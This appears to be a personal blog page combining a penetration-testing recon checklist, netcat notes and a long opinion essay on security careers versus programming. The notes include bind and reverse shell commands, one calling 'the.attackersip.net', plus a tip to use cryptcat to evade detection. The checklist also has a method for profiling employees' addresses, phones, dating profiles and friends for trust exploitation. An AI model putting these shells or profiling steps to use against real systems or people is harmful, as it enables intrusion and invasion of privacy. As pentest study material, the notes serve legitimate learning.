cmdjunkie

1. Enumerate the network to locate all reachable cisco devices
2. Fingerprint the discovered servers (version, ios version, etc.)
3. Check for default configurations (Creds, SNMP strings)
4. Cross reference discoveries with known vulnerabilities

Oftentimes we just don’t know where to begin.  There’s so much to explore and research, it’s almost impossible to cover all of the bases.  This is where a checklist comes into play.  A checklist… well, more like some guidelines to walk through as you begin information gathering

Information gathering is of the utmost importance.  Penetration Testing requires you to be an excellent researcher; one that can use conventional and non-conventional means of gathering information.  To identify the areas that should be performed almost immediately are the following:

1.) G2 – What I like to call the G2, is the Google 2.  This means, the absolute first thing you do is spend at the least, 2 hours researching your target using Google.  Bust out the Google Hacking ref and start getting creative with searches. Here are some Initial G2 Steps to Take (IG2ST):

a.      Identify the Web Server and Version Number

b.      Perform a //:googleSite:: to Identify Reachable and Indexed Hosts

c.      Identify Vulnerabilities for Target’s Web Server Version (Low Hanging Fruit [LHF])

d.      Search and Archive any Exploits for Discovered Vulnerabilities

e.      Search for Reachable Office Files (DOC, PPT, XLS, ADB, VSD)

f.       Search for Login/Password Pages

g.      Search for PDF Files

h.      Search for Email Addresses

After you feel satisfied with your findings, go back, review what you have and organize it in a suitable, and manageable manner

2.)Email Harvest – Right off the bat, when you perform the Initial Mandatory Email Harvest (IMEH), you obtain the target’s naming convention, micro-targets inside (or associated with) the Main Target, as well as Individuals that lead to secondary points of access/entry.  Alternatively, if your target is an individual, this step should be to gather a Contacts and Associates List (CAL).  They both should be organized the same way and expanded upon as information about each Individual/contact is delved into.

There are certainly more ways to harvest emails from a web site or the web.  Just be sure to organize them well.  After you've got a significant list, spend some time researching a couple of them.  Maybe you'll find one that looks like an easy target to exploit.  Maybe you'll find one with an online dating account.  The object here is not to look at the emails as just addresses, but as Assets, and PPOE.  This becomes a matter of trust exploitation because familiarity breeds trust.  As does association, obviously.  

Researching an Asset

1. Search for email address
2. Identify secondary email address (personal, business, legacy)
3. Identify Real Name
4. Identify Address
5. Identify Phone Number
6. Identify Former-Address
7. Identify High School and College
8. Identify Social Networking Presence
9. Identify Online Dating Presence
10. Identify at least 5 friends or associates.  (Family, Co-workers, ex's, College Friends, Roommates, etc.)

3.)Perimeter Enumeration – For a company, this is performed by identifying all Potential Points of Entry (PPOE) in the Public Facing systems that are available to the Internet.  This step includes:

a.   Identify the network ranges owned and operated by the target
# whois [target.com]
# dig [target.com]

b.   Identify the mail servers
# nslookup set type=mx [target.com]

c.   Identify the DNS Servers
# nslookup set type=ns [target.com]

d.   Perform a Forward Lookup Bruteforce (FLB)

e.   Perform a reverse lookup bruteforce on the network ranges owned and operated
# for ip in $(seq 1 255); do host 216.200.241.$ip | grep "domain name pointer"; done

f.       Attempt a Zone Transfer on the DNS Servers Identified

These should be steps taken as the first thing you do, regardless of whether you’re just peepin, or actually on a job.  The reason being, is because this is non-intrusive enumeration that happens very often.  It would be difficult to identify malicious intent from a NSD’s perspective because whois and ns queries are very common place among typical inbound traffic into private networks.  Typical probes.  Although the attempted Zone Transfers can trigger low impact alarms they are still very common place and any admin worth his/her salt should have zone transfers disabled

More to Come

Network Shell Review:  Having a shell flying through a network is malicious.  Most IDS solutions will identify a shell traversing a network segment quicker than you can say, “busted”.  To get around that, use cryptcat when placing shells on a system.  The file is larger, but the method is hard to detect.   

Netcat Uses:

Bind_Shell:  A bind shell is a shell server waiting to be connected to.  A bind shell works by spawning a shell command line when the listening port is connected to.  In netcat, you can fire up a bind shell with the follow commands:

WIN: >> nc –lvp 443 –e c:\windows\system32\cmd.exe

NIX: >> nc –lvp 445 –e /bin/bash

Be sure to swap out nc for cryptcat when you get a chance

Reverse_Shell:

A reverse shell is an outbound connection that’s carrying the shell with it in transit.  Like I mentioned above, this is not a new attack or technique.  Most IDS systems will identify a cmd.exe or bash shell being sent out to the Internet.  In fact, most AV systems that are minimally kept up to date will probably quarantine nc.exe before it even has a chance to execute.  Anyway here’s a reverse shell

Attacker:  WIN >> nc –l –p 443

Target: NIX >> nc –nv the.attackersip.net 443 –e /bash/bin

HoneyPot NC:  Honeypots are dummy systems, setup to represent real systems that look appealing to attackers.  A crafty way to setup a linux machine to look like a Windows machine to attackers is to use netcat to open standard windows ports.  You can catch all type of good stuff:

#!/bash/bin
while[1];
nc –l –p 137 >> capture.txt;

nc –l –p 139 >> capture.txt;

nc –l –p 445 >> capture.txt;

done

Port Redirector: Netcat is useful for redirecting ports as well.  Use the following command to act as a proxy server:

# nc –l –p 8888 –c “nc google.com 80”

Once you connect to this machine on port 8888, you have a connection to google.com on 80.  Run a quick HTTP get and watch the server ID come back to you

--EXTRAS:

Persistent Netcat Listener

# while [1]; do echo “Started”; nc –l –p 41523 >> capture.txt; done

A little background: I’ve been a Security “Professional” since 2007.  I started at a small company that just did consulting and eventually went to work for the government for 4 or so years.  Over time, my idea of what Security work should be and what it actually was grew further and further out.  Eventually, I found myself versed and experienced enough to really see the trouble that lies ahead.  Yes, I started to realize the absolute inevitability of working in Information Security for a mid-large sized financial organization; there’s nothing you can do to prevent problems and headaches… just detect it, and respond to it appropriately and get back to work.

Business Security: Information Security in a corporate setting, characterized by misused talent, security budget meetings and fancy pie charts for management.  Business Security in all its glory is just another department in your typical, large, office building.  Business Security is doing a product analysis to determine what DLP solution you want to implement over the next quarter or two.  Business Security is being forced to listen to users complain about VPN connectivity when you know damn well it’s their home internet connection.  Business Security is satisfying your direct reports… and their direct reports… and their direct reports.  Business Security is going to the security conventions to network and pass out your new business cards with that shiny new minted CISSP accreditation appended to your name.

Business Security is what’s wrong with Security.

But it keeps money in your wallet and food on the table you say?  This is true, but it comes with the cost of your dignity and reputation.  Business Security is a farce.  The allegedly more secure firms and organizations are still at risk of compromise because all it takes is a dedicated attacker.  Seriously, let me repeat that, all it takes is a dedicated attacker.

It’s not a matter of if you’ll get attacked, it’s when.  Everyone at this point is at risk and as a security professional, there’s really nothing you can do to stop it.  And consequently, you’ll wind up getting blamed.  How can you possibly work to secure every single attack vector your company has implemented in order to appease the employees?  Personally, I’m the sole security engineer for my company.  Given, it makes me feel great that I’ve found myself in this position, but at the same time, I’m well aware of what’s possible, what criminals are capable of, and how they can and will go about doing it.  It’s a stressful profession, and I don’t like stress.

Now, I’ve been in school for Software Engineering for the better part of 3 years.  Technically, I’m a junior, but similar to my high school experience, I should have graduated by now.  Anyway, I find software development to be the absolute panacea to hyper-paranoid security work.  As a programmer, I can literally just conjure up an idea and make it happen.  As a programmer, I can turn thought into reality.  I can build tools, bridges, communication means, secure transport options, automated robots, slick interfaces, and digital gateways to real world information.  Programming and Software Construction is the art of transforming brainwaves into an intangible interactive product.  Programming is rooted in creativity and logic.  Not only that, but when the solution is built and the requirements are met, you’ve completed something, and you’ve created something as well.  Software developers are essentially the Gods of the virtual world.  We create the cities, communities, tools and metaphorical vehicles that allow people to navigate and live in these worlds.  There’s a power complex to it, and each programmer will tell you they’re a genius in their own mind.

The security world has a few subdivisions that should be mentioned, as not all security personnel are the same.  Consider the idea that InfoSec has skyrocketed in the last 10 years as not only a lucrative career, but as a general item of business interest. It has become a hot topic and a magnet for confused college graduates trying to get a good paying job.  Entry into the field is simple if you’ve obtained a CISSP (which is a bootcamp and a $500 test fee away) in addition to the degree in Art History you managed to obtain.  These watered down newly minted CISSPs find their ways into a companies’ risk management team and voila, 65k/year and the ability to say you work in InfoSec.  Now, I’m not saying these people are worthless, because they do have their purpose.  I’m saying they’re should be divisions within Security and because there aren’t, these individuals get grouped with guys like myself

--Guys like myself…  Now before I delve into the security guy that I represent, allow me to briefly touch upon the hardcore security junkie.  The hardcore security junkie is the guy that has no social life but seems to basically know everything there is about security.  Hardcore Sec Junkies write highly specialized books on specific topics, blog endlessly about their research, and still have time to watch their companies’ network.  These are the people that wind up going into business for themselves doing security consulting because they’re that damn good.  These are the guys you want working for you, not against you.  Often times, these guys will have a couple of SANS certs, a published white paper and an affinity for energy drinks.  (Generalization, I know… don’t hate).  These guys you should know exactly what to do with… put them in the basement, let them hack.

Now… Security guys like myself are enigmas.  Personally, I’m not obsessed with security.  Oftentimes I just want to go home and leave my desk alone.  I hardly ever do that, but I do get burnt out.  Guys like myself I like to refer to as idealistic generalists.  I (we) have an idealistic point of view when it comes to the internet, computer use, security, and software development.  The world is bigger than Defcon and Blackhat.  The idealistic security generalist should actually not have the word security in the description.  I don’t want to put myself in a box and call myself a security professional; I’m so much more than that.  I actually like to program.  It’s my chosen career choice.  I like to go out and meet people, flirt with women and stay active.  I realize that I’m never going to have the time to become as incredibly deadly as I want to be with BackTrack but you know what?  That’s okay.  I’ve said it before and I’ll say it again, security is too wide spread to be mastered, and that’s where the problem is.

Personally, I’d rather study software engineering, which actually has limits to the foundations on which you learn.  Given, there’s still a lot to learn, but the difference is in the execution.  As a programmer, you can take a learned concept and apply it in many different ways, only limited by your skill-set as a programmer and your imagination.  There are no limits in programming and software development once you solidify your fundamental understanding of current construction models and trends (e.g. OOP).  As a programmer, you’re only responsible for the attention you've paid to the code that you’ve written.  You’re limitless; without limits… no limits.  Security on the other hand is one big prison that gets smaller and smaller the more you become aware of security concepts.  I challenge any seasoned security professional to tell me they sleep well at night because they’re sure that nothing can go wrong.  When you’re a security professional and you’ve trained your brain to think the worst, to consider the weak points of compromise and to find methods of circumvention, everything is insecure to you.  Security is not necessarily something you can be good at; it’s just something you increasingly become more versed in.  When you continue to practice security you start to realize that everything you do is pretty much useless because you’re aware of what the guys that have all the time in the world are capable of.  Nietzsche said, “whoever battles monsters should take care not to become a monster too, for if you stare long enough into the abyss, the abyss stares also into you”.  To relate that to the Security Profession, when you’re in the trenches, reading about new exploits every day and the crackers that write them, you start to understand that you’re fighting a losing battle

So for the aspiring security professional I would really give it some thought as to what you think you’re getting into.  Do you want to get in as a non-technical analyst, perform some risk assessments and work your way up the corporate ladder, ultimately winding up in an executive security position?  Do you want to learn how to “haxx computers”?  Are you getting into the industry because all you’re seeing these days are computer security positions?  Or are you really just a programmer that wants some more excitement and increased responsibility?  Whatever your true intentions, please realize that you will be fighting an army of men and women who will sit around for hours, upon days, upon months, just to come up with effective ways to break into your network, and you’ll likely have no way to prevent it.  You’ll spend the majority of your time putting in third-party systems that you hope will bring you some peace of mind, only to get owned by a crafty South American cracker that was targeting cute and susceptible, security ignorant Ashley, over there in Marketing.  There is no way to stop the coming storm.  There is nothing you can do.

If you’re just into technology and you want to work on computers, why not just become a programmer?  It’s actually obvious… it’s because most people don’t have the capacity to be a good programmer.  Most can’t fathom the thought of sitting at a console for 8+ hours, pecking away at source code, trying to hammer out a solution.  I tell you what, it’s a better alternative than driving yourself crazy with the thought of the cyber-boogieman getting access and lurking through your network, stealing your company’s intellectual property and making off with it, only to blame you for your negligence.

I have techno-lust.  I love computers, programming, security, games, operating systems and just cool shit that can be done with software.  It’s what I’m good at, and the more I hone my programming abilities, the more I want to pursue software engineering than security.  Security – more specifically Business Security -- has absolutely nothing to do with technology.  It’s about policy, control and people.  If you want to work on security systems and really do cool security work, you either work for a SOC (eh), or go to graduate school for computer security research.  Do not be fooled by the promise of exciting work and catching digital bad-guys.  It’s hardly the reality of the security industry.

In conclusion, computer science/software engineering is the way to go in my humble opinion if you’re like me. If you’re creative, inventive and logical, try some programming, you might enjoy it and find your calling.  To me it’s a philosophical thing.  I’m an idealist and I find absolute euphoria in creating something that originated in the confines of my consciousness.

To those MBAs, or recent college grads that just want a good, decent paying job right out of college, go get your CISSP and put your resume out there.  You’re the one’s the businesses need.  You’re the ones who don’t code, who aren't technical and wouldn't be caught writing a script if they had a gun to their head.  Businesses need you and your CISSPy attitudes.  Businesses need those shmucks to talk it up in meetings and explain risk ratings to security naive executives.

For those hackers out there that want to make money doing what they love, DO NOT pursue a position in security (business security). You will be absolutely miserable, forced to perform tasks that are mind-numbingly boring compared to what you want to do.  Get out there and go get that coveted C-EH, OSCP, GPEN, etc., and then go find a security consulting company that can take you under their wing and teach you the ropes.  Stay away from the businesses.  They think they need you, but they don’t.